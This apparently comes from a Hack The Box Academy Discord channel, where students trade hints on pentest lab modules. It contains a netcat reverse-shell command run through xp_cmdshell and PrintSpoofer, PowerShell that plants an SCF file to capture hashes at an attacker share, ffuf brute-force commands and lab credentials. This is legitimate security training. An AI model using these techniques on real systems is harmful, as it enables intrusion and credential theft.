#modules

1 messages · Page 303 of 1

thorny cave
#

the user I found isn't admin either

acoustic owl
thorny cave
#

logged in, it says don't have admin privilege.

acoustic owl
limber river
#

is it the DC$ user equivalent to domain admin ?

umbral fulcrum
#

Just solved it, thanx...

#

also I'm not sure how to prevent this exactly, if anyone up for a little sanity check on it (Broken Authentication > Skills Assessment), please

exotic pilot
#

Another 1 bites the dust, maybe Freddie Mercury was a secret hacker on the quiet?

grand portal
#

I've trying to gain Fully interactive TTYs on meterpreter shell, I got by exploiting using metasploit.

I couldn't use python,2,3 etc for the same.

However I was able to work through by using

/bin/bash -i

This is much better but still very less functional.

Any idea what should be done here?

unborn cradle
#

Hey I’m stuck on the server side attacks skill assessment module, anyone who has recently solved it?

unborn cradle
#

Umm I’m having trouble figuring out how to approach the issue, any of the links on the page like menu etc don’t seem to be vulnerable and I didn’t really find any directories through ffuf enumeration

acoustic owl
inland fossil
#

Hello, I have an issue - Windows Privilege Escalation - SeImpersonate and SeAssignPrimaryToken - Question 1:
After connecting
python ~/Tools/impacket/examples/mssqlclient.py sql_dev@{IP} -windows-auth
I use
SQL (WINLPE-SRV01\sql_dev dbo@master)> enable_xp_cmdshell
with response:
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

But fail to get response for the whoami (or any other) command
SQL (WINLPE-SRV01\sql_dev dbo@master)> xp_cmdshell whoami /priv
SQL (WINLPE-SRV01\sql_dev dbo@master)>

Do you have some ideas? I am stuck here from quite a while now 😦 Thanks.

inland fossil
acoustic owl
sonic plume
#

hi could i get a little nudge for file inclusion skill assesment?

inland fossil
acoustic owl
thorny cave
#

@umbral fulcrum how to go about it?? I got username= gladys&pass=dWinaladasD13 but it takes me to 2fa.php and from their dead end.

pseudo kiln
#

anyone else issues with spawning targets ? mine hangs in "Target(s) are spawning..."

alpine mural
#

Hi, is there anyone for a sanity check with the Dead Code module of Secure Coding 101: Javascript?

umbral fulcrum
umbral fulcrum
slim lotus
#

Hi new here

#

Can someone help me in using burp

#

If you want to help them please DM me sir

umbral fulcrum
acoustic owl
inland fossil
acoustic owl
inland fossil
# acoustic owl Perhaps because xp_cmdshell is not activated?

It was activated, I was able to get a reverse shell using xp_cmdshell c:\PrintSpoofer.exe -c "C:\nc.exe IP PORT -e cmd.exe"
But only because I knew the SeImpersonatePrivilege was enabled as it was the point of the exercise. If I didnt Id just be stuck there.

fathom pendant
#

If so I think there's still the impacket issue on it

#

Where you need to reinstall it

sinful tide
#

In the api attack module in the broken authentication part I have tried brute forcing the OTP several times over and over again in less than 5 min with ffuf but it's not working ( I am using 6 digest otp ) and even tired logging in but it did not work did anyone encounter the same issue? here is the wordliste i used https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/6-digits-000000-999999.txt
i even inspected my requests on burp and it looked ok

GitHub

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, pas...

inland fossil
sinful tide
spark spruce
sonic ravine
#

Can someone help me with this section
"Introduction to Malware Analysis
Code Analysis
Reverse Engineering & Code Analysis"

viral lotus
#

Hi I am trying to troubleshoot something, when I ran nmap from one vm in parrot it gave me the answer I was looking for when I ran the exact same from my kali vm it would give the ports but not the info from the script, I tried searching but other than nuking the vm what could be wrong with nmap to cause it? It has been confusing me all day (both nmaps are running same versions)

#

I obviously cant really move onto the last lab in the network enum vith nmap module without fixing it, thanks

sinful tide
viral lotus
glass quail
#

Is there a way to restart a module so I can do the updated version

fathom pendant
#

No

glass quail
#

ok thank you

tranquil crystal
#

https://academy.hackthebox.com/module/108/section/1233

Module: Vulnerability Assessment
Section: Nessus Skills Assessment

What IP am I supposed to run a scan on?

I might have ran it on the wrong IP. I ran a scan on the 10.x machine IP.

Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

#

But I can't even ping this IP: 172.16.16.100

#

So I'm supposed to run scan on the machine IP I guess

#

It says the scan will take one hour, but for me

Start: Today at 6:53 AM
End: Today at 7:11 AM
Elapsed: 17 minutes
#

I didn't find anything the questions are asking about. I'm very confused.

shut vapor
tranquil crystal
#

I'm on the academy VPN

#

What IP am I supposed to scan?

#

I don't have nessus installed myself anywhere

#

Sorry if I misunderstood you

shut vapor
tranquil crystal
#

I'll try scanning that from Nessus then.

shut vapor
#

Yes, you won't be able to access or so much as ping 172.16.16.100 directly from your attack system.

tranquil crystal
#

Oh

#

Thanks

#

Running now. Let's see what happens.

#

There it goes

marsh echo
#

hello i need help for command injection skill assessments, i use || after a to= and i think there are a filter,I think I have tried everything but may be that there is something I do not understand if there is someone who can help me to understand the problem please

honest gyro
#

If I remember correctly u may get an error that reveals a command being executed

#

Try play around with the website

floral crow
marsh echo
#

I think I have used all even whoami

honest gyro
floral crow
#

I looked at my POC to get command execution, all I can say is it took me trying a few different combinations of bypassing filtres ( all from the cheat sheeet), and modifying parameters for the website url as part of it

marsh echo
#

I will reread all the courses because it is too dark for me I really try everything I even try the ajax parameter but nothing

woeful oar
#

i am russian

ember fern
#

epic

#

can anybody assist me with the logrotate exploit from the Linux LPE module?

#

I get the```sh
Waiting for rotating <redacted>
Renamed backups with backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...

#

and trying it again fails

#

nvm got it working

#

so unreliable

#

why does echoing it beforehand work better lol

honest gyro
#

In the skill assessment u have a site with files and u got three options
View
Copy
Move
Which one of those do u think is doing something in the backend aka doing a command execution

#

Try to use something simple like (pwd) and try to put every bypassing method u have learned

rustic sage
#

Do yall know where i can find help about tor broswer?

honest gyro
rustic sage
shut vapor
honest gyro
shut vapor
#

whoops, I replied to the wrong person there, sorry

sinful mulch
#

Ok the module that uses ODAT needs updated to not provide the "installation" script. The pentest flavors of linux make it difficult to install it that way especially if you're using an arch based system instead of deb based. The install from the ODAT github does work though...so far.

#

I wasted too much time trying to fix that script... it probably would have been fine had i built my own arch system but the preconfigured systems make the pip install stuff not work properly

acoustic owl
#

All software installations shown are basically for the PwnBox. Does it work in the PwnBox?

sinful mulch
#

Not sure, haven't tried that. I'm using an AthenaOS vm, but I did try it with a kali vm and had similar problems since the python environments are locked down on them. so the pip3 stuff doesn't work, it wants you to use pipx but then pipx wants you to use pip since it's a library.

fathom pendant
sinful mulch
#

Yeah, I just always worry about doing stuff like that on preconfigured systems cause I don't know how much or what exactly if anything that would break

fathom pendant
#

It doesn't break much of anything

sinful mulch
#

oh ok nice . I really just need to spend the time and build me a nice little nixos box so I can just use tools on the fly as needed instead of having to bload the entire system for a task

fathom pendant
#

I use parrot myself

frosty ferry
#

What path do i do after infosec?

marble island
#

Can you guys help me out? what steps should i take to make sure that i will pass the CPTS? What i do is i read the entire module, then i make a summary for myself, then do the exercises by referecing the module. Am i doing it right or should i do something elses?

frosty ferry
marble island
#

Me too

frosty ferry
marble island
#

First im getting the cpts, then i will do htb labs and ctftime

marble island
quick grotto
#

Hey all, I'm currently working on AD and on using inveigh. i ran the ps1 script but there was no hash in the output and i also checked the txt file of the log and there was no hash too. idk where im doing wrong. any help will be appreciated.

shut vapor
frosty ferry
fathom pendant
marble island
#

I dont have any right now but it goes like this "To hack ftp, first run a nmap scan on port 21 with default scripts, after detecting what ftp service use nmap scripts that will show more info about that process, then check for anonymous login..."

marble island
fathom pendant
#

Aka do it as you read the section

marble island
fathom pendant
#

Don't read then go back

#

Because as you do, you can adjust your notes

uncut carbon
#

Aye guys looking to start a group if anybody interested hmu!!!🤙🏻

marble island
#

So the steps are 1 read 2 take notes 3 do exercises 4 done learning

fathom pendant
#

Heck half of my notes in the web modules is me doing the question for it and screenshotting the process

#

As the examples don't always match the practical

sinful mulch
#

@marble island Oh shit i've been doing it wrong this whole time! i've been going straight to the attacks....

sinful mulch
#

IK

fathom pendant
#

Unless you're just cheating by following writeups/videos

sinful mulch
#

I was just being facetious

#

nope don't look up that shit until i'm certain it's a module issue lol

fathom pendant
#

But otherwise the right way is the way that helps you retain the knowledge

marble island
#

What i am doing is that i just get familiar with the concepts, know where is the knoledge that i will need to the CPTS, and thats it

fathom pendant
#

The knowledge level you'll need is what's taught

sinful mulch
#
  • resourcefulness
marble island
#

No matter what i do i allways forget the commands and the specifcs

#

Like, my port scan found smb, i know that there is smb section on footpriting module

sinful mulch
#

There's other tools out there not well listed or used by the pentest flavors of linux. Github has lots of great projects out there

marble island
#

My new strategy is: read the module, do a summary of what i read, do the exercises (see solution if im stuck), then i will know where to go back to when im doing the cpts

floral crow
#

Ok folks. I am stuck on the Web attacks skills assessment. I have identified the || admin user || , the || token|| for || uid 52|| . I changed the || uid in storage from 74 to 52 || and then go to the profile page and I see I am || The admin user, however I am unable to change the password I get access denied, I think because I have the session cookie of the htb-student user. I tried changing from a POST to a PUT, and I get missing parameters. || I have fuzzed for the parameters using FFUF and am coming up empty|| Can someone nudge me, I don't want the answer, but i'm clearly missing something.

fathom pendant
marble island
#

I think i will pass doing this am i right?

fathom pendant
sinful mulch
#

it's not like one of those absolute book answer question tests.

#

Looking at you PPL!

fathom pendant
#

(Just don't be surprised if something doesn't work as the example)

#

Always be flexible in your methods

sinful mulch
#

let me rephrase that for you. Expect the example to not even be close to working....

fathom pendant
#

While the example might not work; the method can still apply

marble island
#

Is the method 1 read 2 make summary 3 do exercises 4 make skills assesment then make exaplanation of what i did. a good mothod?

sinful mulch
#

i've run into examples not working more times than i would have thought honestly, and i think a lot of it is just the difference in systems

#

some...but i've run into a lot that won't work on anything not the pwnbox

fathom pendant
sinful mulch
#

sure, I mean I wrote a python script that kinda walks you through the step of tools for what phase you're on...

#

it's like notes but more interactive

marble island
#

wait what? you did a python script that does what?

fathom pendant
sinful mulch
#

basically you enter the target(s) then it has a list of tools it calls for whatever step you're on. and then for each tool it has a list of different attack options....just automates things a little bit. let's you drink more coffee

marble island
#

gee thats overkill

sinful mulch
#

i like making my life easier :-p

fathom pendant
sinful mulch
#

oh right

fathom pendant
#

And for the exam you'd still need to prove you know what you're doing via the report

marble island
#

what did you 2 do to learn the modules and pass the cpts?

sinful mulch
#

true, I do need to add in automation to report generation :-p thanks for the idea

fathom pendant
#

You need to follow the template

sinful mulch
#

haven't taken cpts yet still going through modules.

#

and you can't automate that? :-p (openvas, maltego)

fathom pendant
#

No

sinful mulch
#

there are most definitely expensive automated tools that generate detailed reports for you

fathom pendant
#

Besides if you use sysreptor the template is basically right there

fathom pendant
sinful mulch
#

eww

marble island
#

How did you pass the cpst @fathom pendant ?

fathom pendant
#

I haven't taken it

sinful mulch
#

I'm gonna steal facebooks thought stealing technology and you just think it and the report fills itself out for you

fathom pendant
#

There's plenty of articles/blog posts in #cpts

marble island
#

How would you go about studying the modules if you where to take the cpts?

fathom pendant
#

I just do, and write out my process of performing the exercises

#

Documenting w/ screenshots and such

#

I use Obsidian for my notes

marble island
#

write the process of performing the exercises? I think i am going to do that

#

isnt't obsidan dirty propietary software?

fathom pendant
#

Yes. It helps solidify your understanding

#

No

floral crow
#

works good for me

fathom pendant
#

You can use it for free

#

Free for personal use

marble island
#

free as in freedom?

floral crow
#

I have all my notes synching to git every 2 mins

marble island
#

i use cherrythree

fathom pendant
#

And there's a plugin for everything

sinful mulch
#

notation is nice too

#

I like obsidian for using the canvas though

fathom pendant
floral crow
sinful mulch
#

gitchad should definitely be a website

marsh echo
marble island
#

I will try obsidian, thanks for the tip i did not see the github link in their main website and thought it to be propietary

honest gyro
floral crow
#

Cheetsheets for HTB copy over nicely in markdown to obsidian

fathom pendant
junior oxide
#

i have a question regarding report writing in general. i am currently doing ANE module and found tons of vulnerabilities and wanna write findings on them all but what if i in real-life didn't manage to find ALL the vulnerabilities or write them but instead put the ones that got me initial access? would that affect my score in the CPTS exam and get me rejected?

marsh echo
fathom pendant
#

And you can't write about a vuln you don't find

marble island
#

Btw is anybody a pentester? How would you people go about getting a pentester job? My strategy is do the CPTS, then start doing the hackthebox labs to train for CTFS, then do CTFs till i eighter got it from winning ctf or from impressive CTFtime score. I live in Brazil and would like to get pentester job abroad

floral crow
junior oxide
fathom pendant
#

Your attack path will include the vulns you used

floral crow
fathom pendant
#

Think about the info you'd want if you're the client

junior oxide
#

i mean say there is xss found in one subdomain out of 10 and in those 10 subdomains you didn't find that xss but you found command injection that gave you initail access and then wrote a report based on that would hackthebox fail you for not writing that xss that you didn't find?

gray yacht
fathom pendant
#

And just because you couldn't exploit it, doesn't mean another attacker couldn't

fathom pendant
junior oxide
#

i don't but those who wrote the exam do what if they say "skill issue" then fail me for it?

fathom pendant
#

They grade the exam based on what you found. And your report info

#

They're grading it as the company contracting you, and they don't know all the vulns

#

But again your questions are getting specific to the exam grading. Which cannot be answered by anyone

junior oxide
#

thats better to know but i'll write everything just in case in my exam

fathom pendant
#

Write everything you find. Always. As a customer, I'd be pissed if you found a vuln but didn't tell me about it

marble island
#

How would you people go about getting a penetration tester job?

fathom pendant
#

Get your foot in the door with tech

marble island
#

I work as a linux sysadmin in a hostpital

fathom pendant
#

As the market is saturated af with already skilled/talented individuals

fathom pendant
#

Otherwise just search.

marble island
#

You know that hospitals have crap opsec? i did a pentest for them

gray yacht
fathom pendant
floral crow
fathom pendant
honest gyro
floral crow
storm elk
quick grotto
#

hey! sorry for randomly jumping on this message. Can you tell how to enable smb capture?

floral crow
quasi wave
#

hi this command isn't working:

cp /usr/share/laudanum/aspx/shell/aspx /home/tester/demo.aspx

Getting cannot create regular file error.

This is for Laudanum section of shells and payloads module.

#
┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory
┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ sudo cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory
#

wait fixed it

#

I think I fixed it I made the /home/tester folder I wanna see if tutorial works anyways I might have figured it out on my own

#

I figured it out on my own never mind

fathom pendant
#

In this instance [tester] is you

viral lotus
#

I am trying to triage an issue, it's on my end but I don't know what else to do; when I run nmap it won't run scripts to allow me to move on with the network enum with nmap, I tried different os instances

#

on different devices it works except my own vmware workstation lab, what could cause this?

#

I know a work around is to use the pwnbox but if nmap isn't working properly I can't really do ctfs and know what I am getting back is accurate

thorny sluice
#

I'm currently on detecting windows attacks with splunk, authenticating with the credentials they gave me but its not working , "connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!'", I'm using the xfreerdp command? has anyone else run into this issue

foggy jackal
#

hey everyone. can someone share some detailed notes from the dacl attacks i and ii modules please?

fathom pendant
fathom pendant
#

Other peoples' notes do you no good, as they wrote their notes to understand it for themselves

viral lotus
fathom pendant
#

Htb version of parrot != pwnbox

#

They are maintained completely separately

viral lotus
#

no I meant the iso from parrot website

fathom pendant
#

Htb edition is just security edition with some minor theming

viral lotus
#

ohh sorry misread

#

so best point of call moving forward for modules use pwnbox then just take notes?

#

alright thanks, it has been driving me nuts

fathom pendant
#

You can use your own vm

#

It's just only occasionally that for whatever reason pwnbox just works

viral lotus
#

ok cool, thanks for that, it worked on other devices but I will just move on now, thanks for your response

fathom pendant
#

Version difference of tools can also affect outcomes

viral lotus
#

yeah they were all on 7.9.4 which is the latest version of nmap. Doesn't matter I will just use the pwnbox for the hard lab then I can quit moaning haha

fathom pendant
#

The hard lab is pretty simple once you figure out the source of it

supple light
#

remove unnecessary instructions. DM if still stuck.

lofty rivet
#

Hey everyone, I'm currently on the Medium lab of IDS/IPS evasion with nmap. The task is to retrieve the DNS server version, which I though I had completed but isn't the correct answer. Willing to send screenshots in a DM as to not spoil anything for anyone else.

fathom pendant
lofty rivet
#

Apologies, I'm a little confused by that tip. I was able to connect to the target and retrieve information from the nmap scan, which included a version return (possibly incomplete which is why the answer appears wrong?) . The IPS seems to block a nc connection. My scan was only able to retrieve the version information with a UDP scan

#

Update: Exact same command worked with pwnbox. Thanks for the help! Didn't realize that could be an issue

#

Reading upwards a bit I see that someone else had a similar situation on another module. Just for my own curiosity's sake; if the personal vm and the pwnbox are using the same version of nmap, what makes the results change?

fathom pendant
wet finch
#

Attacking Common Applications Attacking GitLab - User Enumeration.

Okay, what wordlist should I be using? I've found 10 users, and 8 of the 10 are made by other people. I've used a number of the wordlists in ||seclists/usernames|| (the shorter lists and running a longer one now) and still haven't found the actual user they're wanting. ||go for defaults||

quasi wave
#

thank you I'm an idiot

#

😆

reef shoal
#

Can someone tell me what kind of job this will get me and how much it pays?

storm elk
#

But to get there: Please read #welcome and #rules 🙂 it will explain how to get verified

wraith pelican
# viral lotus so best point of call moving forward for modules use pwnbox then just take notes...

I was curious about this nmap issue you were speaking about. So I quickly re-ran the nmap medium and hard labs to see if anything has changed since I first done them.
On freshly spawned targets, It works as expected from my parrot vm, same nmap version as yours. During cpts path, i think I never had to use the pwnbox to get an answer.

Also I saw earlier you had issue with freezing parrot. I encountered the same kind of issue with parrot or kali: a keyboard lag leading to freeze the whole thing. A solution for me, with a Intel processor, was to check Virtualize IOMMU option under processor settings. Otherwise I got the processor setting at 2 proc 2 cores, then a fair amount of ram.

late coral
#

hello any one have done broken auth

ffuf -w list/multiplesources-users-fabian-fingerle.de.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

i am fuzzing username if there is any mistake in this cmd

spring mirage
late coral
# spring mirage The only issue I can see is the file you are using for the wordlist. I used the...

i have also use this word list
└─$ ffuf -w Downloads/xato-net-10-million-usernames.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : POST
:: URL : http://94.237.49.212:59399/index.php
:: Wordlist : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=invalid
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: Unknown user.


:: Progress: [1/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [80/8295455] :: Job [1/1] :: 0 req/sec :: Duratio

spring mirage
#

And watch closely for a result to pop up. As soon as one does, stop the scan and see what the result is

late coral
#

ffuf -w Downloads/xato-net-10-million-usernames.txt -u http://83.136.255.40:44527/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : POST
:: URL : http://83.136.255.40:44527/index.php
:: Wordlist : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=invalid
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: Unknown user.


:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:

same issue

rustic sage
#

xfreerdp dying

#

file transfer module
windows section

honest gyro
#

Maybe on other page on some login.php

cloud urchin
# rustic sage

try adding /timeout:10000 and also wrap your password in quotes due to the special characters. if that doesn't work switch regions.

late coral
honest gyro
late coral
#

broken auth

#

enumerating users

cloud urchin
#

your command isn't the exact same as the example, not sure if that's your problem though

honest gyro
# late coral enumerating users

all that i can think of is that u didnt get the vpn files to work well or that ur worldlist dosent have the vaild username

cloud urchin
#

your command is fine i just ran it and got the answer maybe switch vpn's

honest gyro
#

the one i use has 8295455 usernames

late coral
#

i will update you

oak girder
#

hello

#

The sudo responder -wrf -v -I tun0 command appears fine in the case, but I started pwnbox incorrectly

cunning frigate
oak girder
#

Thanks, but deleting the -r doesn't seem to work either

next bronze
#

there's also the -h flag you can use

oak girder
#

Hey buddy, I also downloaded the latest version on Github

next bronze
#

great, the repo documentations will tell you what flags you can use, so will -h

oak girder
#

I was wondering why pwnbox doesn't have python2 built in

#

Oh, so I typed the wrong version

#

Hey, his title is capturing SCCM_SVC hash but I only have htb-student traffic

next bronze
#

module and section?

arctic sentinel
#

Good morning, as anyone finished the Exploiting Web Vulnerabilities in Thick-Client Applications

#

I am with the fatty-client.jar application... I have finally managed to install jave 8 but now I get this error when I try to run it

next bronze
#

don't run as root

#

also don't they provide you a machine with java already installed?

arctic sentinel
#

it comes with java 17

#

the pawnbox

#

thanks!

next bronze
arctic sentinel
#

but I give up trying to solve the module using the windows machine...

#

window of the machine looks super small and I could not get the new fatty-client file to run...

#

now I am trying to solve it with the pawnbox

cloud urchin
#

use remmina or add /dynamic-resolution to your xfreerdp command

arctic sentinel
#

seems a lot of people had trouble with this module...

#

I am using remmina

#

lets see if I manage 🙂 for sure I will ask more things! thank you!

unique ether
#

Is there a study plan for cpts like oscp?

oak girder
#

@next bronzeCan you give me a hint?

dim wolf
next bronze
oak girder
unique ether
#

Is that there

dim wolf
#

you will have to make a schedule for yourself

next bronze
dim wolf
#

everyone learns differently, so something like that has to be made by the student

oak girder
#

I captured it, but no SCCM SVC

next bronze
#

make a scf or lnk file and point to your own ip

oak girder
#

It doesn't seem to be working.

cloud urchin
#

did you rename the extension after saving it in notepad?

next bronze
#

it's also on the desktop and not in a share

brave field
#

Why can't I traverse into the Desktop directory as a normal user?

next bronze
#

because that's root's desktop

brave field
#

execute permission is there

oak girder
#

You mean my (IconFile=\10.10.14.101\share\legit.ico) should be IconFile=\10.10.14.101\legit.ico?@next bronze

next bronze
next bronze
#

place the file in the target's share

oak girder
opal nexus
#

Hello, in Attacking Enterprise Networks Module - Lateral Movement section, does anyone know what is the password for the bloodhound they suggest to use here? they dont give it in the section's page.

brave field
#

it's my own VM

oak girder
#

Is that what it means?

brave field
next bronze
#

yes, you can experiment in other dirs like /tmp, messing with permissions in /root is a bad idea

next bronze
# oak girder

sure but what other ways can you access and place files in smb shares?

winged olive
#

Hello 👋

#

How to know neighbour wifi password to android ☑️

cloud urchin
#

you go ask them the password

winged olive
cloud urchin
#

guess you're out of luck then

winged olive
cloud urchin
#

guess you'll just have to use your own internet

winged olive
#

Any application for know any password of wifi

rustic sage
#

hi everyone,
in linux fundamental module, system information lession,
i couldnt submit the answers for
What is the path to htb-student's home directory? and
What is the path to the htb-student's mail?

im sure im inserting correct but it shows wrong answer

final vine
cloud urchin
#

looks like you need to log in as a domain admin

final vine
cloud urchin
grand loom
#

xfreerdp /v:10.129.80.249 /u:htb-student /p:'Academy_student_AD!' /timeout:1000 /cert:ignore
[05:45:48:027] [2825:2826] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[05:45:48:032] [2825:2825] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

#

keep getting this error any help?

cloud urchin
#

looks like it timed out. maybe change regions. also might want to increase your timeout value.

oak girder
#

C:\Department Shares\Public\IT\test.scf

#

But I have this problem

rustic sage
#

You need sudo

#

Or maybe something else is running on port 80

oak girder
#

No

#

─[eu-academy-3]─[]─[htb-ac-1104324@htb-qbbbwtcm8y]─[~]
└──╼ [★]$ sudo lsof -i :80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python3 3756 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 4u IPv4 333171 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:47912 (ESTABLISHED)
python3 198574 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 198574 htb-ac-1104324 4u IPv4 481084 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:39734 (ESTABLISHED)

cloud urchin
#

port 80 doesn't really matter since you're trying to farm hashes from smb

oak girder
#

$scfContent = @"
[Shell]
Command=2
IconFile=\<your_ip_address>\icon.ico
[Taskbar]
Command=ToggleDesktop
"@

$scfFilePath = "C:\Department Shares\Public\IT\test.scf"
Set-Content $scfFilePath -Value $scfContent -Force

#

He doesn't seem to have taken any of the other users

#

help me

cloud urchin
#

good job you should probably delete that pic though

oak girder
#

thank you for your help

final vine
next bronze
rustic sage
final vine
ember fern
#

in the Python Library Hijacking section of the Linux LPE module, there is a SUID py3 file that we can run. However, if we hijack a library and add our own os.system("id") code, the SUID binary (when run) outputs the id of htb-student rather than root. If I do the same via sudo, however, it runs as root. Does this mean I can't python lib hijack SUID scripts?

#

I assume this is because the binfmt extension actually makes it run /usr/bin/python script.py, so the executable is actually /usr/bin/python, which is not SUID?

eager ledge
shut vapor
ember fern
#

yeah /bin/sh drops privileges now, it's a security feature

#

but I think the reason python does it is slightly different 😄

gray yacht
bright quiver
#

I'm really stuck and can't seem to get past this module Information Gathering - Web Edition -> Virtual Hosts. The task is to bruteforce virtual hosts on the target system. but it's not working i have tried almost all the tools like gobuster ffuzz and others but it seems that i can't succesfully find the full domain of "web" and others can someone please help me in the right direction?

opal nexus
mystic chasm
#

I have a question

mystic chasm
#

Is there a machine that van read and emulate rfid signals not thé flipper zero tho

mystic chasm
#

Does it need laptop to work @bright quiver

bright quiver
mystic chasm
#

Oke thanks do they sell it on amazone

bright quiver
#

I don't think so but they are quit expensive for the OEM one but the functions they have are worth the price. proxymark 3 RDv4 can be used in standalone mode

mystic chasm
#

Thanks Alot

#

Is it like more then 200

bright quiver
#

keep in mind this is the best of the best tool that you can get and outperforms any flipper zero in function, but requires that you have knowledge about NFC and frequencies blocks and stuff

gray yacht
bright quiver
north bramble
#

hello, why am I unable to connect to rdp?

shut vapor
north bramble
nimble lodge
#

Hi all, I'm doing the lab in Information Gathering - Web Edition, Virtual hosts module. I added the IP address and domain name in /etc/hosts (94.237.59.199 inlanefreight.htb) and then enter the gobuster command (gobuster vhost -u http://inlanefreight.htb -w subdomains-top1million-110000.txt -t 50
), I'm getting the above error. Can anyone help me with this?

fathom pendant
#

Also you need to specify the port

#

Because there indeed isn't a web port on 80 for that target

nimble lodge
nimble lodge
#

I tried with fuff tool

fathom pendant
#

Well that would be your isp, not the target

#

You shouldn't be running any av on your vm

gilded radish
nimble lodge
nimble lodge
ember fern
#

love me in the metasploit module I have to compile a binary but Pwnbox has GLIBC 2.34+ but the remote server does not and also has no gcc so I can't compile a binary that works there kek

fathom pendant
#

I don't remember needing to compile anything... I just grabbed from a release

ember fern
#

I tried dropping into shell but it's non-interactive

fathom pendant
#

What section? I genuinely don't recall compiling anything for meterpreter, maybe the msfvenom payloads

ember fern
#

dw isok

#

I need to run a sudo exploit

#

under Sessions

fathom pendant
#

Oh... I didn't need to do any compiling

#

Just background the session, pull up the b* post-exploit, attach it to the session that your connection is on. And just run it

#

You might need to adjust the LPORT

#

And lhost

#

But I don't remember compiling anythign

ember fern
#

lmfao

#

yeah ok worked now

#

lol

#

thanks @fathom pendant

fathom pendant
ember fern
#

yup

#

I did the Linux LPE module just before this so

#

it was fresh in my mind

lusty sierra
#

Hey, what should be the next step after I complete all the tiers in starting point?

autumn pilot
#

you can move onto retired machines

frail maple
#

Hi

snow parcel
#

why can't I post on general chat?

storm elk
unique ether
#

Is this cert going to be industry standard soon?

dim wolf
#

hopefully it will, it will take some time though

bright pivot
#

mail,google map,and i forget another one

#

i have already checked all directory

#

can some one help me?

bright pivot
foggy monolith
#

For the SMB flag in Module 77 Section 726, I'm wondering why in the world the SMB connection is so unstable. You get the first couple of commands typed in just fine, then after about 30 seconds, everything you type takes 2 minutes to appear in the terminal, then after a minute or 2 beyond that, a NT_STATUS_INVALID_NETWORK_RESPONSE error occurs and the whole SMB connection just disconnects. Why is this?

#

I find myself repeatedly having to run:

while [ $? -ne 0 ]; do echo "" | sudo smbclient \\\\<target IP address>\\users; done

Why is the connection so fickle as to make this necessary?

storm elk
#

Also don’t spoil the content

bright pivot
#

